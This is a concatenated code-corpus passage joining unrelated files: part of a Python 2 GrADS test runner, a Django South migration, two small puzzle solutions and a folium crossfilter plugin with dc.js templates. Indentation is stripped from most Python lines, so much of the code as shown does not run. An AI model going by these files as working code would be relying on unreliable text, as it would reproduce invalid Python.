#......................................................................
class TestGrb2File(unittest.TestCase):
def tearDown(self):
del self.ga
def _GenericSetUp(self,bin):
global GrADSTestFiles
global GrADSBinaryFiles
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga.open(GrADSTestFiles['grb2'])
def test_01_Open(self):
"""
Check whether file was opened correctly.
"""
type = 'Gridded'
vars = ['apcpsfc', 'hgtprs', 'prmslmsl', 'rhprs', 'tmpprs', 'ugrdprs', 'vgrdprs']
var_levs = [0, 3, 0, 3, 3, 3, 3]
nx, ny, nz, nt = (144,73,3,4) # no E size yet
fh = self.fh
self.assertEqual(type,fh.type)
self.assertEqual(nx,fh.nx)
self.assertEqual(ny,fh.ny)
self.assertEqual(nz,fh.nz)
self.assertEqual(nt,fh.nt)
vars2 = fh.vars[:]
var_levs2 = fh.var_levs[:]
self.assertEqual(vars.sort(),vars2.sort())
self.assertEqual(var_levs.sort(),var_levs2.sort())
def test_03_Display(self):
"""
Displays several variables and checks contour intervals
"""
self._CheckCint('apcpsfc',0,140,10,z=1,t=2)
self._CheckCint('0.01*prmslmsl',950,1050,10,z=1,t=1)
self._CheckCint('hgtprs',900, 1600,100,z=1,t=1)
self._CheckCint('rhprs',0,100,10,z=1,t=1)
self._CheckCint('tmpprs',235,300,5,z=1,t=1)
self._CheckCint('ugrdprs',-30,30,10,z=1,t=1)
self._CheckCint('vgrdprs',-25,35,5,z=1,t=1)
self._CheckCint('apcpsfc',0,80,10,z=1,t=4)
self._CheckCint('0.01*prmslmsl',950,1040,10,z=1,t=4)
self._CheckCint('hgtprs',900, 1600,100,z=1,t=4)
self._CheckCint('rhprs',0,100,10,z=1,t=4)
self._CheckCint('tmpprs',240,300,5,z=1,t=4)
self._CheckCint('ugrdprs',-25,30,5,z=1,t=4)
self._CheckCint('vgrdprs',-25,30,5,z=1,t=4)
self._CheckCint('hgtprs',10800,12400,200,z=3,t=4)
self._CheckCint('rhprs',0,100,10,z=3,t=4)
self._CheckCint('tmpprs',200,235,5,z=3,t=4)
self._CheckCint('ugrdprs',-40,100,10,z=3,t=4)
self._CheckCint('vgrdprs',-50,50,10,z=3,t=4)
def _CheckCint(self,name,cmin,cmax,cint,z=1,t=1):
"""
Check contour intervals during display.
"""
self.ga('clear')
self.ga('display %s(z=%d,t=%d)'%(name,z,t))
self.assertEqual(cmin,int(self.ga.rword(1,2)))
self.assertEqual(cmax,int(self.ga.rword(1,4)))
self.assertEqual(cint,int(self.ga.rword(1,6)))
def _GenericSetUp(self,bin):
global GrADSTestFiles
global GrADSBinaryFiles
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga.open(GrADSTestFiles['grb2'])
#......................................................................
# -----
# grads
# -----
class grads_grb(TestModelFile):
def setUp(self):
self._GenericSetUp('grads','grb')
def test_05_Read_stream(self): pass
def test_05_Read_sequential(self): pass
class grads_grb2(TestGrb2File):
"""Grib-2 specific tests"""
def setUp(self):
self._GenericSetUp('grads')
class grads_nc(TestModelFile):
def setUp(self):
self._GenericSetUp('grads','nc')
class grads_ctlnc(TestModelFile):
def setUp(self):
self._GenericSetUp('grads','ctlnc')
class grads_url(TestModelUrl):
def setUp(self):
self._GenericSetUp('grads','url')
class grads_stn(TestStnUrl):
def setUp(self):
self._GenericSetUp('grads','http://monsoondata.org:9090/dods/stn/metar/2009/02/day05')
class grads_hdf(TestModelFile):
def setUp(self):
self._GenericSetUp('grads','hdf')
class grads_ctlhdf(TestModelFile):
def setUp(self):
self._GenericSetUp('grads','ctlhdf')
class grads_pdef(TestPdefFile):
def setUp(self):
self._GenericSetUp('grads')
# --------
# gradsdap
# --------
class gradsdap_grb(TestModelFile):
def setUp(self):
self._GenericSetUp('gradsdap','grb')
def test_05_Read_stream(self):
pass
def test_05_Read_sequential(self):
pass
class gradsdap_grb2(TestGrb2File):
"""Grib-2 specific tests"""
def setUp(self):
self._GenericSetUp('gradsdap')
class gradsdap_nc(TestModelUrl):
def setUp(self):
self._GenericSetUp('gradsdap','nc')
class gradsdap_ctlnc(TestModelUrl):
def setUp(self):
self._GenericSetUp('gradsdap','ctlnc')
class gradsdap_url(TestModelFile):
def setUp(self):
self._GenericSetUp('gradsdap','url')
class gradsdap_ctlhdf(TestModelFile):
def setUp(self):
self._GenericSetUp('gradsdap','ctlhdf')
class gradsdap_hdf(TestModelFile):
def setUp(self):
self._GenericSetUp('gradsdap','hdf')
class gradsdap_pdef(TestPdefFile):
def setUp(self):
self._GenericSetUp('gradsdap')
#......................................................................
def run_all_tests(verb=2,BinDir=None,DataDir=None):
"""
Runs all tests based on the standard *model* testing file.
"""
# Search for a reasonable default for binary dir
# ----------------------------------------------
if BinDir is None:
BinDir = ''
if os.path.exists('../src/grad.c'):
BinDir = '../src/'
# Search for a reasonable default for data files
# ----------------------------------------------
if DataDir is None:
sample = 'model.grb'
for dir in ( '.', 'data', '../data', '../../../data'):
if os.path.exists(dir+'/'+sample):
DataDir = dir + '/'
break
# File names
# ----------
global GrADSTestFiles
GrADSTestFiles = { 'grb' : DataDir+'model.ctl', \
'grb2': DataDir+'model_25.ctl', \
'nc' : DataDir+'model.nc', \
'ctlnc' : DataDir+'model_nc.ctl', \
'url' : 'http://monsoondata.org:9090/dods/model', \
'hdf' : DataDir+'model.hdf', \
'ctlhdf' : DataDir+'model_sds.ctl', \
'pdef': DataDir+'pdef.ctl', \
'dap' : DataDir+'model_dap.ddf' }
global GrADSBinaryFiles
GrADSBinaryFiles = { 'grads' : BinDir+'grads', \
'gradsdap' : BinDir+'gradsdap' }
print ""
print "Testing with GrADS Data Files from " + DataDir
    if BinDir == '':
print "Testing with GrADS binaries from PATH"
rc = os.system('which grads')
if rc:
raise GrADSError, "cannot find grads"
else:
print "Testing with GrADS binaries from " + BinDir
print ""
# Assemble the test suite
# -----------------------
load = unittest.TestLoader().loadTestsFromTestCase
TestSuite = []
npass = 0
Failed = []
# grads
# -----
bin = 'grads'
if os.path.exists(GrADSBinaryFiles[bin]):
TestSuite.append(load(grads_grb))
TestSuite.append(load(grads_grb2))
TestSuite.append(load(grads_nc))
TestSuite.append(load(grads_ctlnc))
TestSuite.append(load(grads_url))
TestSuite.append(load(grads_stn))
TestSuite.append(load(grads_hdf))
TestSuite.append(load(grads_ctlhdf))
TestSuite.append(load(grads_pdef))
print '+ Will test GrADS binary <%s>'%GrADSBinaryFiles[bin]
npass += 1
else:
print '- Not testing GrADS binary <%s>, file missing'%GrADSBinaryFiles[bin]
Failed.append(GrADSBinaryFiles[bin])
print ""
all = unittest.TestSuite(TestSuite)
# gradsdap
# --------
bin = 'gradsdap'
if os.path.exists(GrADSBinaryFiles[bin]):
TestSuite.append(load(gradsdap_grb))
TestSuite.append(load(gradsdap_grb2))
TestSuite.append(load(gradsdap_nc))
TestSuite.append(load(gradsdap_ctlnc))
TestSuite.append(load(gradsdap_url))
TestSuite.append(load(gradsdap_hdf))
TestSuite.append(load(gradsdap_ctlhdf))
TestSuite.append(load(gradsdap_pdef))
print '+ Will test GrADS binary <%s>'%GrADSBinaryFiles[bin]
npass += 1
else:
print '- Not testing GrADS binary <%s>, file missing'%GrADSBinaryFiles[bin]
Failed.append(GrADSBinaryFiles[bin])
print ""
all = unittest.TestSuite(TestSuite)
if not npass:
print "Could not find a single binary to test..."
return 1
# Go for it
# ---------
os.system("/bin/rm -rf output")
os.system("/bin/mkdir -p output")
Results = unittest.TextTestRunner(verbosity=verb).run(all)
if len(Failed)>0:
print "Could NOT test %s GrADS binaries: "%len(Failed), Failed
# Return number of errors+failures: skipped binaries do not count
# ---------------------------------------------------------------
if not Results.wasSuccessful():
raise IOError, 'GrADS tests failed'
else:
os.system("/bin/rm -rf output .grads.lats.table")
| 2.625 | 3 |
virtual/lib/python3.6/site-packages/category/south_migrations/0001_initial.py | kenmutuma001/galleria | 0 | 12786531 | <reponame>kenmutuma001/galleria<gh_stars>0
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Category'
db.create_table('category_category', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=255, db_index=True)),
))
db.send_create_signal('category', ['Category'])
# Adding model 'Tag'
db.create_table('category_tag', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=255, db_index=True)),
))
db.send_create_signal('category', ['Tag'])
# Adding M2M table for field categories on 'Tag'
db.create_table('category_tag_categories', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('tag', models.ForeignKey(orm['category.tag'], null=False)),
('category', models.ForeignKey(orm['category.category'], null=False))
))
db.create_unique('category_tag_categories', ['tag_id', 'category_id'])
def backwards(self, orm):
# Deleting model 'Category'
db.delete_table('category_category')
# Deleting model 'Tag'
db.delete_table('category_tag')
# Removing M2M table for field categories on 'Tag'
db.delete_table('category_tag_categories')
models = {
'category.category': {
'Meta': {'ordering': "('title',)", 'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'category.tag': {
'Meta': {'ordering': "('title',)", 'object_name': 'Tag'},
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['category']
| 2.25 | 2 |
8kyu/get_the_middle_character.py | nhsz/codewars | 1 | 12786532 | # http://www.codewars.com/kata/56747fd5cb988479af000028/
def get_middle(s):
if len(s) % 2 == 1:
        return s[len(s) // 2]
    else:
        return s[len(s) // 2 - 1 : len(s) // 2 + 1]
| 3.453125 | 3 |
day01.py | Jafnee/advent-of-code-2019 | 0 | 12786533 | def pt1(masses):
return sum(get_fuel(mass) for mass in masses)
def pt2(masses):
return sum(get_fuel_rec(mass) for mass in masses)
def get_fuel(mass: int):
return mass // 3 - 2
def get_fuel_rec(mass):
if (fuel := get_fuel(mass)) <= 0:
return 0
return fuel + get_fuel_rec(fuel)
def test_fuel_needed():
assert get_fuel(12) == 2
assert get_fuel(14) == 2
assert get_fuel(1969) == 654
assert get_fuel(100756) == 33583
def test_fuel_rec():
assert get_fuel_rec(1969) == 966
assert get_fuel_rec(100756) == 50346
if __name__ == '__main__':
masses = [int(mass) for mass in open('day01.txt', 'r')]
print(pt1(masses))
print(pt2(masses))
| 3.546875 | 4 |
folium/plugins/crossfilter.py | BibMartin/folium | 4 | 12786534 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""
Crossfilter
------
Crossfilter.
"""
from jinja2 import Template
import json
#from .utilities import color_brewer, _parse_size, legend_scaler, _locations_mirror, _locations_tolist, write_png,\
# image_to_url
#from .six import text_type, binary_type
from folium.element import Figure, JavascriptLink, CssLink, Div, MacroElement
from folium.map import FeatureGroup
from .heat_map import HeatMap
#from .map import Map, TileLayer, Icon, Marker, Popup
class Crossfilter(Div):
def __init__(self, data, **kwargs):
"""Create a Crossfilter
Returns
-------
Folium Crossfilter Object
"""
super(Crossfilter, self).__init__(**kwargs)
self._name = 'Crossfilter'
self.data = data
self.add_children(MacroElement("""
{% macro script(this, kwargs) %}
var {{this._parent.get_name()}} = {};
{{this._parent.get_name()}}.data = {{this._parent.data}};
{{this._parent.get_name()}}.crossfilter = crossfilter({{this._parent.get_name()}}.data);
{{this._parent.get_name()}}.allDim = {{this._parent.get_name()}}.crossfilter.dimension(
function(d) {return d;});
{% endmacro %}
"""))
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}">
{{this.html.render(**kwargs)}}
</div>
{% endmacro %}
{% macro script(this, kwargs) %}
dc.renderAll();
{% endmacro %}
""")
def render(self,**kwargs):
super(Crossfilter,self).render(**kwargs)
figure = self._parent.get_root()
assert isinstance(figure,Figure), ("You cannot render this Element "
"if it's not in a Figure.")
figure.header.add_children(
CssLink("https://cdnjs.cloudflare.com/ajax/libs/dc/1.7.5/dc.css"),
name='dcjs_css')
figure.header.add_children(
CssLink("https://cdnjs.cloudflare.com/ajax/libs/leaflet/0.7.3/leaflet.css"),
name='leaflet_css')
figure.header.add_children(
CssLink("https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css"),
name='bootstrap_css')
figure.header.add_children(
JavascriptLink("https://cdnjs.cloudflare.com/ajax/libs/d3/3.5.6/d3.min.js"),
name='d3js')
figure.header.add_children(
JavascriptLink("https://cdnjs.cloudflare.com/ajax/libs/crossfilter/1.3.12/crossfilter.min.js"),
name='crossfilterjs')
figure.header.add_children(
JavascriptLink("https://cdnjs.cloudflare.com/ajax/libs/dc/2.0.0-beta.20/dc.js"),
name='dcjs')
figure.header.add_children(
JavascriptLink("https://cdnjs.cloudflare.com/ajax/libs/leaflet/0.7.3/leaflet.js"),
name='leaflet')
figure.header.add_children(
JavascriptLink("https://cdnjs.cloudflare.com/ajax/libs/underscore.js/1.8.3/underscore-min.js"),
name='underscorejs')
class PieFilter(Div):
def __init__(self, crossfilter, column, name="", width=150, height=150, inner_radius=20,
weight=None, order=None, colors=None, label=None, **kwargs):
"""TODO docstring here
Parameters
----------
"""
super(PieFilter, self).__init__(width=width, height=height, **kwargs)
self._name = 'PieFilter'
self.crossfilter = crossfilter
self.column = column
self.name = name
self.width = width
self.height = height
self.inner_radius = inner_radius
self.order = order
self.weight = weight
self.colors = [x for x in colors] if colors else None
self.label = label
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}" class="{{this.class_}}">{{this.html.render(**kwargs)}}</div>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.dimension = {{this.crossfilter.get_name()}}.crossfilter.dimension(
function(d) {return d["{{this.column}}"];});
document.getElementById("{{this.get_name()}}").innerHTML =
'<h4>{{this.name}} <small><a id="{{this.get_name()}}-reset">reset</a></small></h4>'
+ '<div id="{{this.get_name()}}-chart" class="dc-chart"></div>';
{{this.get_name()}}.chart = dc.pieChart('#{{this.get_name()}}-chart')
.width({{this.width}})
.height({{this.height}})
.dimension({{this.get_name()}}.dimension)
.group({{this.get_name()}}.dimension.group()
{% if this.weight %}.reduceSum(function(d) {return d["{{this.weight}}"];})
{% else %}.reduceCount(){% endif %}
)
.innerRadius({{this.inner_radius}})
{% if this.label %}.label({{this.label}}){% endif %}
{% if this.colors %}.ordinalColors({{this.colors}}){% endif %}
{% if this.order %}.ordering(function (d) {
var out = null;
var order={{this.order}};
for (var j=0;j<order.length;j++) {
if (order[j]==d.key) {out = 1+j;}
}
return out;}){% endif %};
d3.selectAll('#{{this.get_name()}}-reset').on('click',function () {
{{this.get_name()}}.chart.filterAll();
dc.redrawAll();
});
{% endmacro %}
""")
class RowBarFilter(Div):
"""TODO docstring here
Parameters
----------
"""
def __init__(self, crossfilter, column, name="", width=150, height=150, inner_radius=20,
weight=None, order=None, elastic_x=True, colors=None, **kwargs):
super(RowBarFilter, self).__init__(width=width, height=height, **kwargs)
self._name = 'RowBarFilter'
self.crossfilter = crossfilter
self.column = column
self.name = name
self.width = width
self.height = height
self.inner_radius = inner_radius
self.order = order
self.weight = weight
self.elastic_x = elastic_x
self.colors = [x for x in colors] if colors else None
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}" class="{{this.class_}}">{{this.html.render(**kwargs)}}</div>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.dimension = {{this.crossfilter.get_name()}}.crossfilter.dimension(
function(d) {return d["{{this.column}}"];});
document.getElementById("{{this.get_name()}}").innerHTML =
'<h4>{{this.name}} <small><a id="{{this.get_name()}}-reset">reset</a></small></h4>'
+ '<div id="{{this.get_name()}}-chart" class="dc-chart"></div>';
{{this.get_name()}}.chart = dc.rowChart('#{{this.get_name()}}-chart')
.width({{this.width}})
.height({{this.height}})
.dimension({{this.get_name()}}.dimension)
.group({{this.get_name()}}.dimension.group()
{% if this.weight %}.reduceSum(function(d) {return d["{{this.weight}}"];})
{% else %}.reduceCount(){% endif %}
)
.elasticX({{this.elastic_x.__str__().lower()}})
{% if this.colors %}.ordinalColors({{this.colors}}){% endif %}
{% if this.order %}.ordering(function (d) {
var out = null;
var order={{this.order}};
for (var j=0;j<order.length;j++) {
if (order[j]==d.key) {out = 1+j;}
}
return out;}){% endif %};
d3.selectAll('#{{this.get_name()}}-reset').on('click',function () {
{{this.get_name()}}.chart.filterAll();
dc.redrawAll();
});
{% endmacro %}
""")
class BarFilter(Div):
def __init__(self, crossfilter, column, width=150, height=150, bar_padding=0.1,
domain=None, groupby=None, xlabel="", ylabel="", margins=None,
weight=None, elastic_y=True, xticks=None, time_format=None, **kwargs):
"""TODO docstring here
Parameters
----------
"""
super(BarFilter, self).__init__(**kwargs)
self._name = 'BarFilter'
self.crossfilter = crossfilter
self.column = column
self.width=width
self.height=height
self.bar_padding=bar_padding
self.domain=json.dumps(domain)
self.groupby=groupby
self.xlabel=xlabel
self.ylabel=ylabel
self.margins=json.dumps(margins)
self.xticks=json.dumps(xticks)
self.time_format=time_format
self.weight = weight
self.elastic_y = elastic_y
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}" class="{{this.class_}}">{{this.html.render(**kwargs)}}</div>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {
domain : {{this.domain}},
groupby : {{this.groupby}},
xAxisTickValues : {{this.xticks}},
};
{{this.get_name()}}.dimension = {{this.crossfilter.get_name()}}.crossfilter.dimension(
function(d) {
return Math.floor(
(d["{{this.column}}"]-{{this.get_name()}}.domain[0])/{{this.get_name()}}.groupby)
+{{this.get_name()}}.domain[0]/{{this.get_name()}}.groupby;
});
{{this.get_name()}}.ticks = [];
for (var j=0; j<{{this.get_name()}}.xAxisTickValues.length; j++) {
{{this.get_name()}}.ticks[j] = {{this.get_name()}}.xAxisTickValues[j]/{{this.get_name()}}.groupby;
}
dc.barChart("#{{this.get_name()}}")
.width({{this.width}})
.height({{this.height}})
.dimension({{this.get_name()}}.dimension)
.group({{this.get_name()}}.dimension.group()
{% if this.weight %}.reduceSum(function(d) {return d["{{this.weight}}"];})
{% else %}.reduceCount(){% endif %}
)
.x(d3.scale.linear().domain([
{{this.get_name()}}.domain[0]/{{this.get_name()}}.groupby,
{{this.get_name()}}.domain[1]/{{this.get_name()}}.groupby,
]))
.elasticY({{this.elastic_y.__str__().lower()}})
.centerBar(false)
.barPadding({{this.bar_padding}})
.xAxisLabel("{{this.xlabel}}")
.yAxisLabel("{{this.ylabel}}")
.margins({{this.margins}})
.xAxis()
.tickValues({{this.get_name()}}.ticks)
.tickFormat(function(x){
{%if this.time_format %}
var dateformat = d3.time.format("{{this.time_format}}");
return dateformat(new Date(x*{{this.get_name()}}.groupby));
{% else %}
return x*{{this.get_name()}}.groupby;
{% endif %}
});
{% endmacro %}
""")
class FeatureGroupFilter(FeatureGroup):
def __init__(self, crossfilter, name=None, fit_bounds=False,
circle_radius=None, color="#0000ff", opacity=1., **kwargs):
"""
"""
super(FeatureGroupFilter, self).__init__(**kwargs)
self._name = 'FeatureGroupFilter'
self.tile_name = name if name is not None else self.get_name()
self.crossfilter = crossfilter
self.fit_bounds = fit_bounds
self.circle_radius = circle_radius
self.color = color
self.opacity = opacity
self._template = Template(u"""
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.feature_group = new L.FeatureGroup();
{{this.get_name()}}.updateFun = function() {
this.feature_group.clearLayers();
var dimVals = {{this.crossfilter.get_name()}}.allDim.top(Infinity)
for (var i in dimVals) {
var d = dimVals[i];
var marker =
{% if this.circle_radius %}L.circleMarker([d.lat, d.lng],
{
fillColor: '{{ this.color }}',
fillOpacity: {{ this.opacity }}
}).setRadius({{this.circle_radius}})
{% else %}L.marker([d.lat, d.lng],{opacity:{{this.opacity}} }){% endif %};
marker.bindPopup(d.popup);
this.feature_group.addLayer(marker);
}
{{this._parent.get_name()}}.addLayer(this.feature_group);
{% if this.fit_bounds %}{{this._parent.get_name()}}
.fitBounds(this.feature_group.getBounds());{% endif %}
}
dc.dataTable('#foo')
.dimension({{this.crossfilter.get_name()}}.allDim)
.group(function (d) { return 'dc.js';})
.on('renderlet', function (table) { {{this.get_name()}}.updateFun();});
{{this.get_name()}}.updateFun();
{% endmacro %}
""")
class TableFilter(Div):
def __init__(self, crossfilter, columns, size=10, sort_by=None, ascending=True, **kwargs):
"""TODO docstring here
Parameters
----------
"""
super(TableFilter, self).__init__(**kwargs)
self._name = 'TableFilter'
self.crossfilter = crossfilter
self.columns = columns
self.sort_by = sort_by
self.ascending = ascending
self.size = size
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<table id="{{this.get_name()}}" class="{{this.class_}}">
<thead>
<tr class="header">
{%for col in this.columns%}<th>{{col}}</th>{% endfor %}
</tr>
</thead>
</table>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.dataTable = dc.dataTable('#{{this.get_name()}}');
{{this.get_name()}}.dataTable
.dimension({{this.crossfilter.get_name()}}.allDim)
.group(function (d) { return 'dc.js extra line'; })
.size({{this.size}})
.columns([
{% for col in this.columns %}
function (d) { return d["{{col}}"]; },
{% endfor %}
])
                {%if this.sort_by %}.sortBy(dc.pluck('{{this.sort_by}}'))
{%if this.ascending %}.order(d3.ascending){% else %}.order(d3.descending){% endif %}
{% endif %}
.on('renderlet', function (table) {
table.select('tr.dc-table-group').remove();
});
{% endmacro %}
""")
class CountFilter(Div):
def __init__(self, crossfilter, html_template="{filter}/{total}", **kwargs):
"""TODO docstring here
Parameters
----------
"""
super(CountFilter, self).__init__(**kwargs)
self._name = 'CountFilter'
self.crossfilter = crossfilter
self.html_template = html_template
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}" class="{{this.class_}}">
{{this.html_template.format(
filter='<span class="filter-count"></span>',
total='<span class="total-count"></span>'
)}}
</div>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.dataCount = dc.dataCount("#{{this.get_name()}}")
.dimension({{this.crossfilter.get_name()}}.crossfilter)
.group({{this.crossfilter.get_name()}}.crossfilter.groupAll()
);
{% endmacro %}
""")
class ResetFilter(Div):
def __init__(self, html="Reset all", **kwargs):
"""TODO docstring here
Parameters
----------
"""
super(ResetFilter, self).__init__(**kwargs)
self._name = 'ResetFilter'
self.html = html
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<a id="{{this.get_name()}}" class="{{this.class_}} reset-filters">{{this.html}}</a>
{% endmacro %}
{% macro script(this, kwargs) %}
d3.selectAll('.reset-filters').on('click', function () {
dc.filterAll();
dc.renderAll();
});
{% endmacro %}
""")
class HeatmapFilter(HeatMap):
def __init__(self, crossfilter, name=None, fit_bounds=False, **kwargs):
"""
"""
super(HeatmapFilter, self).__init__([],**kwargs)
self._name = 'HeatmapFilter'
self.crossfilter = crossfilter
self.fit_bounds = fit_bounds
self._template = Template(u"""
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.heatmap = new L.heatLayer(
{},
{
minOpacity: {{this.min_opacity}},
maxZoom: {{this.max_zoom}},
max: {{this.max_val}},
radius: {{this.radius}},
blur: {{this.blur}},
gradient: {{this.gradient}}
})
.addTo({{this._parent.get_name()}});
{{this.get_name()}}.updateFun = function() {
// this.heatmap.clearLayers();
var dimVals = {{this.crossfilter.get_name()}}.allDim.top(Infinity);
var latlngs = [];
for (var i in dimVals) {
var d = dimVals[i];
latlngs.push([d.lat, d.lng]);
}
{{this.get_name()}}.heatmap.setLatLngs(latlngs);
{% if this.fit_bounds %}{{this._parent.get_name()}}
.fitBounds(this.heatmap.getBounds());{% endif %}
}
dc.dataTable('#foo')
.dimension({{this.crossfilter.get_name()}}.allDim)
.group(function (d) { return 'dc.js';})
.on('renderlet', function (table) { {{this.get_name()}}.updateFun();});
{{this.get_name()}}.updateFun();
{% endmacro %}
""")
class GeoChoroplethFilter(Div):
"""TODO docstring here
Parameters
----------
"""
def __init__(self, crossfilter, column, geojson, key_on='feature.properties.name',
name="", width=150, height=150, inner_radius=20,
weight=None, order=None, elastic_x=True, projection=None,
colors=None, **kwargs):
super(GeoChoroplethFilter, self).__init__(width=width, height=height, **kwargs)
self._name = 'GeoChoroplethFilter'
self.crossfilter = crossfilter
self.column = column
self.geojson = geojson
self.key_on = key_on
self.name = name
self.width = width
self.height = height
self.projection = projection
self.inner_radius = inner_radius
self.order = order
self.weight = weight
self.elastic_x = elastic_x
self.colors = colors if colors else None
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}" class="{{this.class_}}">{{this.html.render(**kwargs)}}</div>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.geojson = {{this.geojson}};
{{this.get_name()}}.dimension = {{this.crossfilter.get_name()}}.crossfilter.dimension(
function(d) {return d["{{this.column}}"];});
document.getElementById("{{this.get_name()}}").innerHTML =
'<h4>{{this.name}} <small><a id="{{this.get_name()}}-reset">reset</a></small></h4>'
+ '<div id="{{this.get_name()}}-chart" class="dc-chart"></div>';
{{this.get_name()}}.chart = dc.geoChoroplethChart('#{{this.get_name()}}-chart')
.width({{this.width}})
.height({{this.height}})
.dimension({{this.get_name()}}.dimension)
.group({{this.get_name()}}.dimension.group()
{% if this.weight %}.reduceSum(function(d) {return d["{{this.weight}}"];})
{% else %}.reduceCount(){% endif %}
)
.overlayGeoJson({{this.get_name()}}.geojson.features, "state",
function (feature) {return {{this.key_on}};}
)
